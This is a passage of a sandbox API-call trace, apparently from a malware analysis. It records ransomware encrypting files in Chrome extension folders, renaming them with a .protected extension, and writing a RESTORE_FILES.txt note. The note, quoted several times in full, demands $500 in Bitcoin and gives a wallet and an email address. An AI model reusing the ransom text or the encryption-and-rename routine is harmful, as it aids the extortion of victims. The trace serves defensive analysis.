Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sl\\messages.json.protected") returned 165 [0080.171] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sl\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sl\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sl\\messages.json.protected")) returned 1 [0080.171] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.171] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.171] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sl\\RESTORE_FILES.txt") returned 159 [0080.171] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sl\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sl\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.172] lstrlenA 
(lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.172] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.172] lstrlenA (lpString="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") returned 684 [0080.172] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) 
returned 1 [0080.172] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.172] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.172] CloseHandle (hObject=0x164) returned 1 [0080.173] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.173] lstrcmpiW (lpString1="sr", lpString2="Windows") returned -1 [0080.173] lstrcmpiW (lpString1="sr", lpString2="Program Files") returned 1 [0080.173] lstrcmpiW (lpString1="sr", lpString2="Program Files (x86)") returned 1 [0080.173] lstrcmpiW (lpString1="sr", lpString2="$Recycle.bin") returned 1 [0080.173] lstrcmpiW (lpString1="sr", lpString2="System Volume Information") returned -1 [0080.173] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sr") returned 141 [0080.173] lstrcmpW (lpString1="sr", lpString2=".") returned 1 [0080.173] lstrcmpW (lpString1="sr", lpString2="..") returned 1 [0080.173] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sr\\*") returned 143 [0080.173] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sr\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.173] lstrcmpiW 
(lpString1=".", lpString2="Windows") returned -1 [0080.173] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.173] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.173] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.173] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.173] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sr\\.") returned 143 [0080.173] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.173] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.173] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.173] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.173] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.173] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.173] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.173] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sr\\..") returned 144 [0080.173] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.173] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.173] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.173] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.173] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.173] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 
[0080.173] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.173] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.173] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sr\\messages.json") returned 155 [0080.173] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.173] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.173] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.174] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.174] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.174] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sr\\messages.json") returned 155 [0080.174] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.174] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sr\\messages.json") returned 155 [0080.174] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.174] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sr\\messages.json") returned 155 [0080.174] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.175] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xec, lpOverlapped=0x0) returned 1 [0080.175] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff14, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.175] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xec, lpOverlapped=0x0) returned 1 [0080.175] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.175] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.176] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.176] CloseHandle (hObject=0x168) returned 1 [0080.176] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sr\\messages.json.protected") returned 165 [0080.176] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sr\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sr\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sr\\messages.json.protected")) returned 1 [0080.176] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.176] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.176] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sr\\RESTORE_FILES.txt") returned 159 [0080.176] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sr\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sr\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.177] lstrlenA 
(lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.177] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.177] lstrlenA (lpString="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") returned 684 [0080.177] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) 
returned 1 [0080.178] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.178] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.178] CloseHandle (hObject=0x164) returned 1 [0080.178] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.178] lstrcmpiW (lpString1="sv", lpString2="Windows") returned -1 [0080.178] lstrcmpiW (lpString1="sv", lpString2="Program Files") returned 1 [0080.178] lstrcmpiW (lpString1="sv", lpString2="Program Files (x86)") returned 1 [0080.178] lstrcmpiW (lpString1="sv", lpString2="$Recycle.bin") returned 1 [0080.178] lstrcmpiW (lpString1="sv", lpString2="System Volume Information") returned -1 [0080.178] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sv") returned 141 [0080.178] lstrcmpW (lpString1="sv", lpString2=".") returned 1 [0080.178] lstrcmpW (lpString1="sv", lpString2="..") returned 1 [0080.178] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sv\\*") returned 143 [0080.178] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sv\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.178] lstrcmpiW 
(lpString1=".", lpString2="Windows") returned -1 [0080.178] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.178] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.178] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.178] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.178] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sv\\.") returned 143 [0080.178] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.178] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.178] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.178] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.178] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.178] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.179] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.179] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sv\\..") returned 144 [0080.179] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.179] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.179] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.179] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.179] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.179] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 
[0080.179] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.179] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.179] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sv\\messages.json") returned 155 [0080.179] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.179] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.179] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.179] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.179] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sv\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.179] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sv\\messages.json") returned 155 [0080.179] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.179] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sv\\messages.json") returned 155 [0080.179] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.179] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sv\\messages.json") returned 155 [0080.179] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.179] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xd8, lpOverlapped=0x0) returned 1 [0080.180] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff28, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.180] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xd8, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xd8, lpOverlapped=0x0) returned 1 [0080.180] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.180] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.180] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.181] CloseHandle (hObject=0x168) returned 1 [0080.181] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sv\\messages.json.protected") returned 165 [0080.181] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sv\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sv\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sv\\messages.json.protected")) returned 1 [0080.181] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.181] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.181] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sv\\RESTORE_FILES.txt") returned 159 [0080.181] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sv\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sv\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.182] lstrlenA 
(lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe 